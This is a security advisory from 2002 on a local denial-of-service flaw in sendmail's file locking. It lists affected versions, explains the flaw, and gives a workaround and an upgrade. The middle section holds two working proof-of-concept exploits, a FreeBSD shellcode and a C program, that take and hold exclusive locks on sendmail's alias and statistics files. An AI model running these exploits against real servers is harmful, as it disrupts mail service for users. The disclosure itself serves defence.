
Sendmail File Locking Denial of Service Vulnerability


Published: 2002-05-28
Updated: 2002-05-28
Severity:
Threat: local denial of service
Error type: exceptional condition handling error
Exploit vector: server mode

BUGTRAQ ID:4822

Affected systems
Sendmail Consortium Sendmail 8.9.0
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.3
   + SGI IRIX 6.5.10 f
   + SGI IRIX 6.5.10 m
   + SGI IRIX 6.5.11 f
   + SGI IRIX 6.5.11 m
   + SGI IRIX 6.5.12 f
   + SGI IRIX 6.5.12 m
   + SGI IRIX 6.5.13 f
   + SGI IRIX 6.5.13 m
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10.2
Sendmail Consortium Sendmail 8.11
   - MandrakeSoft Linux Mandrake 7.2
   + RedHat Linux 7.0
   + RedHat Linux 7.0 alpha
   + RedHat Linux 7.0 i386
   + RedHat Linux 7.0 sparc
   - S.u.S.E. Linux 7.0
   - S.u.S.E. Linux 7.0 alpha
   - S.u.S.E. Linux 7.0 ppc
   - S.u.S.E. Linux 7.0 sparc
   + SCO Open Server 5.0.4
   + SCO Open Server 5.0.5
   + SCO Open Server 5.0.6
   + SCO Open Server 5.0.6 a
Sendmail Consortium Sendmail 8.11.1
   + Caldera OpenLinux Server 3.1
   + Caldera OpenLinux Workstation 3.1
   + Conectiva Linux 6.0
Sendmail Consortium Sendmail 8.11.2
   + RedHat Linux 7.1
   + RedHat Linux 7.1 alpha
   + RedHat Linux 7.1 i386
   + RedHat Linux 7.1 ia64
   - S.u.S.E. Linux 7.1
   - S.u.S.E. Linux 7.1 alpha
   - S.u.S.E. Linux 7.1 ppc
   - S.u.S.E. Linux 7.1 sparc
   - S.u.S.E. Linux 7.1 x86
Sendmail Consortium Sendmail 8.11.3
   - MandrakeSoft Corporate Server 1.0.1
   - MandrakeSoft Linux Mandrake 8.0
   - S.u.S.E. Linux 7.2
   - Slackware Linux 7.1
Sendmail Consortium Sendmail 8.11.4
   + Conectiva Linux 7.0
   - Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12
Sendmail Consortium Sendmail 8.12.1
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.3
Detailed description
Sendmail is a widely used mail transfer agent (MTA) that runs on many operating systems.

sendmail uses flock() or fcntl() to lock the files it works on, so that, for example, a process holding a shared (read) lock can read a file while other processes are kept from taking a write lock on it. The weakness lies in what an untrusted local user can do with the same calls. With flock(), any process that can open a file, even read-only, can take an exclusive lock on it; with fcntl(), a read-only descriptor is limited to a shared lock, which still blocks any process that needs a write lock. An attacker who takes such a lock on a file sendmail needs, and never releases it, leaves the application blocked the next time it tries to lock that file.

sendmail's related files, the aliases database, map files, the statistics file and the pid file, are all affected: an attacker holding locks on them can stop sendmail or its helper tools (newaliases, makemap, mailstats) from working. No privilege is needed beyond being able to open the files, which in a default installation are world-readable.

To find out which locking method your sendmail binary was built with, run:

sendmail -bt -d0.10 < /dev/null | grep HASFLOCK

If HASFLOCK appears among the compile-time options printed, sendmail uses flock(); otherwise it uses fcntl(). The flock() case is the more serious one, because there a read-only opener can take an exclusive lock.

Proof-of-concept code
/*

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

More info: http://www.sendmail.org/LockingAdvisory.txt

*/

/* 32-bit FreeBSD/i386 shellcode. It uses the jmp/call trick to get the
 * address of the trailing path string, NUL-terminates it, open()s it
 * read-only (syscall 5), flock()s the descriptor with LOCK_EX (syscall 131)
 * and then loops, so the lock is never released. */
char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
        "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
        "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
        "\x69\x61\x73\x65\x73\x2e\x64\x62";

int main(void)
{
  /* Overwrite main()'s saved return address with the shellcode address, so
   * the shellcode runs when main() returns. This stack layout assumes a
   * 32-bit build without stack protection. */
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
  return 0;
}

-----------------------------------------------------------------------

#include <fcntl.h>
#include <stdio.h>
#include <sys/file.h>   /* flock(), LOCK_EX */
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

/* Open path read-only and take an exclusive flock() lock. The descriptor is
 * deliberately never closed, so the lock is held for the life of the process.
 * Returns the descriptor, or -1 if the file could not be opened or locked. */
static int hold_lock(const char *path)
{
  int fd = open(path, O_RDONLY);
  if (fd < 0) {
    perror(path);
    return -1;
  }
  if (flock(fd, LOCK_EX) != 0) {   /* the original passed 0x02, which is LOCK_EX */
    perror("flock");
    return -1;
  }
  return fd;
}

int main(void)
{
  if (fork() == 0) {
    /* Child: lock the files sendmail, newaliases and mailstats need. */
    hold_lock("/etc/mail/aliases");
    hold_lock("/etc/mail/aliases.db");
    hold_lock("/var/log/sendmail.st");

    /* We are here to stay! */
    for (;;)
      pause();
  }
  /* Parent returns at once; the child keeps the locks. */
  return 0;
}

Solution
As a temporary workaround, restrict the permissions of sendmail's files so that untrusted local users cannot open them at all (the braces need a shell with brace expansion, such as bash or csh):

    chmod 0640 /etc/mail/aliases /etc/mail/aliases.{db,pag,dir}
    chmod 0640 /etc/mail/*.{db,pag,dir}
    chmod 0640 /etc/mail/statistics /var/log/sendmail.st
    chmod 0600 /var/run/sendmail.pid /etc/mail/sendmail.pid

The files must stay readable by the user and group that sendmail and its helper tools run as, so check their group ownership before dropping world read access.

Upgrade to Sendmail 8.12.4.

Related information
Credit: lumpy <dynamo@ime.net>.
References: http://online.securityfocus.com/archive/1/274029
http://online.securityfocus.com/archive/1/274033
Homepage: http://www.sendmail.org/